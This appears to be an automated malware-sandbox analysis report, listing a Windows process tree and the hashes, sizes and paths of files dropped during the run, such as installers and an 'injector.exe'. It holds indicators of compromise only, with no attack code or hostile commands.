  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:2680
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:3620
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
  PID:4740
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:1820
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:64
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
  PID:5004
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:3220
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:3656
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
  PID:4048
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:2876
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:3876
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
  PID:2124
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:4924
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:3540
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
  PID:4168
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
  PID:2328
• C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  1⤵
  PID:2008
• C:\Windows\explorer.exe
  explorer.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:3180
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 992 -ip 992
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:4524
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 992 -ip 992
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5060
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4372
                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:4116
                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:3508
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5060
                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:1744
                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                              explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:3924
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:1432
                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:5096
                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    explorer.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:5112
                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:4048
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5084
                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:3792
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:3032
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:64

Network

MITRE ATT&CK Enterprise v15


Downloads

                                                                                                                                                                                                                                                                                    • C:\ProgramData\Are.docx

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      11KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                                                                                                    • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      102KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      df76ce8699fed75b7a3426eebf580127

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      290214b2cfd15afc810f4cd55c87f885033702dd

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      1681e9a60e272057441a8546fc41a0bc14a877fb011d1d1ebf9a1b6afc68369b

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      71d34e5e4b11c9c5b93b62eac084cd10c1782b7bc3b595c3a2fb79d0c9fa2d3801ccc0e6f2728a3252502f96de8fcb7870e9a6768270e1c65c6c008ba797b6a3

• C:\ProgramData\mozglue.dll
  Filesize: 58KB
  MD5: dc10598651f34fa66cc960426b75addf
  SHA1: 34185a08319a9e85a27b1049ed2e180eea3dc1fa
  SHA256: 4f81550500e70bbc82e159ae30f6c36cdf77c8fce8798c2115d2f1009c8c728b
  SHA512: 957d8fc399e2a80e8543948512c4bdcb2bbb8ad9da8db48caeb2795da0d7301dd5e89565b1fb9ab815f999202dcf96cd42679ba835ef7407992676cec74b0aec

• C:\ProgramData\nss3.dll
  Filesize: 156KB
  MD5: 5897931be7c71ddc241122cd20518654
  SHA1: e3a5456f9c933aa8979b829681adfb4d4eedc016
  SHA256: ee3de93e66cb39c0ccc31fb9692588cc8d7a9b2124e2899a832fb428002bf3f9
  SHA512: 1d742a2b15f226cf06802978652f0da6a96a0b3dae99d0485c57bb82387e62e244d9129a03a22d421c9966a78440efbbc4401c3334f399cd94b83810188de316

• C:\ProgramData\wikombernizc\reakuqnanrkn.exe
  Filesize: 41KB
  MD5: 0d64d3dcbc327c908a8e5d673f48d9fc
  SHA1: 39120b24a10e5c466f63121c7ffecec0d7d16fe0
  SHA256: 18b1d3b797f5d432587bf03551e84490a1619c5f8d596ecca7bdbf58af1ab1a7
  SHA512: a88f591fa056c00a15c761e10ca0646facf14a7e9b6117b340c3da03aa780202e3ccd1b3da583ce0e8d656871027b7c56a8c28d2dd7cc8e73133fd6b17e486e0

• C:\ProgramData\wikombernizc\reakuqnanrkn.exe
  Filesize: 17KB
  MD5: f8e493230d71938f88d66332848bb073
  SHA1: d22317e61922e6207f064a8cae23709fb61ea1dd
  SHA256: 5a5bd560d0f7fc62141a60e124a7b8cd0130ebdcaa820fe523cd7979a2a3636f
  SHA512: ce301f7eef53afa5d6ef5a9cbb602e50295b29ca9c7389aa5f49c18c5bf41577939ffdac9d6ce7b80045804d09f74efc71a2fbd35439c557182893b42db95fcc

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53
  Filesize: 471B
  MD5: 62876997ebe1a7782b290d3e0b42cf5e
  SHA1: 125b7fcdd8b115731b16c4ddc12511ba9ef07b4b
  SHA256: 087ab6e9ddb7c92957c39f04bd236dd4d69bc67aefeed8318ba3e3305fd80232
  SHA512: aa760e4e27f58d798b025f61ccfa11fcf364fbe6a06f2e3c9b855e4ad1386334e0d23783bc980787c3c492746f307a68d7e26e49e444b45923c5a578ac4a2240

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53
  Filesize: 412B
  MD5: c2637b6719f6a23e93d0f1166d66cbf4
  SHA1: c7c236c79bb4224df7ecd9742b79bdd6c0dccd96
  SHA256: b0a9a7b3d509896eb2c255e94130d9fbdcf4328119d1f489b241ec9662c14e8c
  SHA512: 22e96f546e5c6f1c87704df88916c0657c2acb29fdc4f6877fe2558ef2417f508d869a478556d83048deb1942c4913552fc1562eccdde733e806a52b58a6de98

• C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\UA6WZR2N\microsoft.windows[1].xml
  Filesize: 96B
  MD5: b97f6e2cc1520a2e8426851cb68f3b0f
  SHA1: 33a930fe90facb202ec3cd87ca0275af9dd20155
  SHA256: a3546f0c8e475abc90346821be3c3d67f522161ea876c3d14247ba6d79a2b5aa
  SHA512: 9b3771942ffce17a52d4c0598bd0d4bb8f196c8731e5b129524b3d9507d411895e4c43d84479f06e5fb28c3403d6b0ec63b97f3a3cdb598873d17fd637abd06a

• C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
  Filesize: 324KB
  MD5: 2b112a6d732f1262b4a2ef16e776d687
  SHA1: 300fca0505089ccaa5f54a46926a1878c2c416cc
  SHA256: 903e2c86b85620c74466d1725c8aae91d010cd2808e79c88f8b4e7955ea92834
  SHA512: 822e34171be8967f91e1e81ba81d684156e1d98fedc338b5962316177e68cfb1c81076a06e221ef6071d47090949556604faa8997574e24d9633773301b5e46e

• C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
  Filesize: 355KB
  MD5: 1548210955eb85eb6ab7c0acbb0e9dc5
  SHA1: 7d4ca037aabef29ae050901647035b8d7dcd831c
  SHA256: d70e2faad95031607770eb2ce3a1e1550a824f36553ac0885b90bd014f6cba39
  SHA512: b9c70138d92d39f34cf53ad3d6d76b7cd240e8ba0ea96845bc03b255a726aea2696e98a53369eca9ddfb6fca6162b4fe0dd5dd58b2197278055d65cf9078d3f7

• C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
  Filesize: 751KB
  MD5: 0ff69fb6975af6a20508a93692b9d35c
  SHA1: 42bcbb527ab8f847219c1d90044c6e75786c5b1e
  SHA256: b0685c3314ab8cc0fece3351b2348d705726479af5855d71bf37a31116481b1b
  SHA512: eaf82efa815c165187c1e01fd2a9a34219de6cefeab8a93876fbce5ffbc96b9e44e71d6543c82026e79ea575468f65b01916a1b1235b9313c470b4fbc612f9bd

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      457KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      3d497a2919d2e53ee408ac5984676eed

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      51f93a7222ef01d9c808a1e04110a2a8ad02cc2f

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      381ba45ff1a4be6e33a7e4a4bae61e8e9685b02e8079a0766cf674306618f7d2

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      3606dd2d887c8934e1d90a544af5a2b682453e57080cf1e0cec2eda0f893c9756650cd5d07fba523e21c8e260a948469fa40058613180961321b8b60298604d5

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\AA0B.exe

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      35KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      214239b86357459322e74fdb57ce4cce

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      13295cd242eafeb39f4970918f74a046415ca581

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      0a05ac5c787453db65a62ea4987fc1cb47eb386187bfb14eb3565e6a2ede4605

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      3af02d1a9d31171beb23807f213d2f859404b46d6ec7d6adba0665eecfd37a4391c1f41db3ee16b76bc6ca394af9943802ffa914d9f385b654191bf2d4038f07

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      619KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      5cac8c08924e6805b8b976e1a6c1ddd3

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      4ba4d400cab5ccfe4efc2d99789270733cbd078d

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      a49338a38a7702ad6cef0019f1795965088b824dfdafaf87985bd6cb4659d4a2

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      b2e807627f4f9fd976a21985408f3b9e4c21dbd0168310fad35afed09f578fd03e5deb72618bdf77058ab1bb6332468bc3beb9530d9b91bd3558caeb6fb2eec9

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D216.exe

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      89KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      df4153719bf93cc3ef7d3934fe75d815

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      d929cacc16bfcd227c7458fd940eddcaac1553c1

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      0fadd34aa822d465c602a94722aa35556f064cbb69efa44e77ebfe07e79387ca

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      1f8847a341b27a79822046ebff66cab820a3ab59c76dc0548ef8b94ba2203583a6fe88dbd639e93888acfcf1e4918bf8ec7321f49e88fc2738114a17ba57dc62

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D216.exe

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      105KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      3d5860ff13b28a66dd4cbc3bdfa59323

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      f5f60293fefc60cced423a1c61506d926f0644c2

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      3836672bd9458807f12f7fcf462bf92a0b0e2c9848692b94e1c85578ff6a7296

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      affd16034a94cce2c626d685273a4ecff555f384542bea7291758446e85c253d468e09d4e6395bb878a829e0c87a502db2c98a2ee72a4982300b1bf158410aa3

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D216.exe

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      118KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      f7b3b2856fadd7409aa8a475d7214647

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      48e34f6198d8833313c86bf96b49210681f0d582

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      475a5dbc82008cb8a37eb562ddc4d366bdd15aedce311f3f81dcd6a2d747f7f5

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      d2d973bb1a5c2c3564e8175c4e31ddda3a706da607e2cdb26dec377aff1a10fa8998ab6a39d4b2ecc8940c1118c35d938b2d90835e8c0de25b5df456ff7e2295

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D216.exe

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      23KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      048c672b47545cb53cde88463cff9e8d

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      a7202603189c11a7b4161f44959a260d14a802df

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      cfdc20f363e5355b39e397b848359bdf2ddf679d7a0d6837b9d2ba85b42e43bd

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      eba7c49471bde93b997d9a992ff72bffe66dc5e6bd6e22155e40face33b3cc869b8cc170276449a50e474ed9db87e93b76c3fe9ead91419235f077cae92d1009

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D91C.exe

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      92KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      3cee442c6f161beb2d95c3165d2df5f2

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      c42c51b040553315b635bfe632d998d9ef4fc8a0

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      1d84cf47490d22c25d2bd5180fa4058298cb52339aed3466f7318d2d56dbb3b1

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      d8f4cdf5399acc2b00864d4466634c83507e76b914b6591e82275f46ba9fdcbf096034dbee4ac8f416ac3216c4d5937260a10cdc6f7649ec9835ab9e5af37850

                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D91C.exe

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      83KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      7b08adfddb5e328bb58b6959705cf679

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      4fd1e84403e024a7399372a620eee253b4c8db19

  SHA256: a18a0bc0ff8dc32f14b55a399ee043a223d2d4532d2404af585fa09adb046ad6
  SHA512: 12b593c28570e20920a67c3ec021601030d2aff295164387095afcfc620b9a1a05cd2f13d8808da0830c0cb11e06a589b8f61e1bd59f8a83da87f0434f92a162

• C:\Users\Admin\AppData\Local\Temp\F139.exe
  Filesize: 56KB
  MD5: b6748ff05625e9819b726e68a88a9138
  SHA1: 34c2a660ed51e28a5c32795bb51887c4dc875721
  SHA256: e4312e8be1f69de74c32f50f340de53ee042c05b17e834bff82eecf907de6f0d
  SHA512: 0474ac012530069ce2be2fdc9ee851de174a7ec6a680e76b4b4a423c7ea473fdee0f184b0e190a28e9ba1e07c27f992533fe811ebedb6e19fcda4036c2e54a1d

• C:\Users\Admin\AppData\Local\Temp\F139.exe
  Filesize: 15KB
  MD5: 545659831744d6fc9a9693cea0399ccf
  SHA1: c6e3764cb67e4ce16a25eaffa6317ad38134b694
  SHA256: c70ec3a2fb40276d83d3dddd69a7c98ff2b7cca7babb88fbc18be32656edc13d
  SHA512: 29ca4ba9efeec532afa0f999820c655ab6cd5de2f2d47b826d2000f6f399e307f727450af9d876585bbb723733828d252ad58d1720610921db99f70694eaa9a9

• C:\Users\Admin\AppData\Local\Temp\FirstZ.exe
  Filesize: 1KB
  MD5: 416c86010c09fe4b9a27d9254e211a1f
  SHA1: ba372d9ad6715848c1cf7692ff1236c212f847ae
  SHA256: 22085ff3e536acded0f65127d10233a67a17452b49ce05b30d9e50b77d415ff5
  SHA512: d26696d353be55d254e2efbf0d8741c9df967c2c42cc4d44b518205685d295747524ffc8ebd9dc46d99965bda6e5d48e209b90c62576398d34694e0ad67130ff

• C:\Users\Admin\AppData\Local\Temp\FirstZ.exe
  Filesize: 284KB
  MD5: 027683e722bab2e4377ec452629ad74d
  SHA1: f59081a2f0fbcd58735c514df074f26cbd2ce014
  SHA256: 21c818b871eadd2c81f307df8f35802b2acdba13958153790e5b1d6bbd563c0c
  SHA512: ead624dfc963f4152970102903b7f7482ba833dc4d1241fce6ee246e1c95de9014fddc0c0b9a08c799ac701f69a65ef1540c2fe32682003e73fa7db9915ad79f

• C:\Users\Admin\AppData\Local\Temp\FirstZ.exe
  Filesize: 407KB
  MD5: b2024a23ab1c9252e4a8f7025e153bf4
  SHA1: 018a4132ff1f38b25f2760f786393248ac1c6b06
  SHA256: 315720e074330db5058b9796ca0218e87ca1807f1640601f1dbd6562d5afd856
  SHA512: dd6e590cd908c7c1934436247f97d41325b7efd8fa696e6926d909a183966c225e602664a0c2401b226949d05fe5610894bc5d4f604efdcf2e9354d544ffbda1

• C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
  Filesize: 1.2MB
  MD5: a404b4ae2513376edeecb59baf5dbedc
  SHA1: afe29cbc40a9699eda7b325db21a7b04e8f25b08
  SHA256: 067d015fdad95156df5b6d9fb0a61c2b3eca6a4984c05d3dc167dc2a1b438f3a
  SHA512: 744775d54bc9a34fb543934cf45c9f71560b78fe12c4dbb2460a70c22eaffebf2f1308f2a64c767f92a1e402c01dd5332347a736335c45083b0501dab3c89274

• C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
  Filesize: 582KB
  MD5: c44759d4de6ae6fb0e8a9f97cbc77c76
  SHA1: 04d35db6adb36d4de9238c8742a682442bb5c5d8
  SHA256: 956a64a630a21f51e799fb156d84d220c3f57b80cf574dce9f071d6cf3831e8f
  SHA512: 587b629eaad1b5a3a9da6e0d054fccbf26086631a822170ea118db31408ee4b0e6f2d64366f712be0c451ca54f28988b15f218c46b59d0d2b4bdcb60f0aa6c1d

• C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
  Filesize: 326KB
  MD5: be2b24cc36d5af4fa30b19a7d2c123a2
  SHA1: 311e1ee5bedb11eb422e40fbf2117344eec92c67
  SHA256: 42a9cb5e78a790e8cd6d313d034d5993702adc8524193190fb4d2aac840a6078
  SHA512: 04bf48606cad695649bfe7b0d0c609befe86ed89a71d265f3f7107ff5dd870f8eb71510a9ed52b3e536dee86df3434bcc4d8d60bcc0ed5c134a9c44b4a8ac0ed

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lmgfnya2.dk1.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
  Filesize: 112KB
  MD5: 2fc16440056599d85ef09e0ee6ff8a47
  SHA1: 0e2cfcf11cbc2e98199ffe7be977d6e52dfbf7b9
  SHA256: 1b1d16a935d0a1bd3359744f4eabdaf43b82404a719bacbd9066e4da8a71b409
  SHA512: 2a31ca4e391a6f0e2bf335c3a337e76128f4160f0d68d22b46b6e324d9fc6bd10ba5d51dec26a7b66e87978183d3f9cc137161d923454d1f18124ecbc1126753

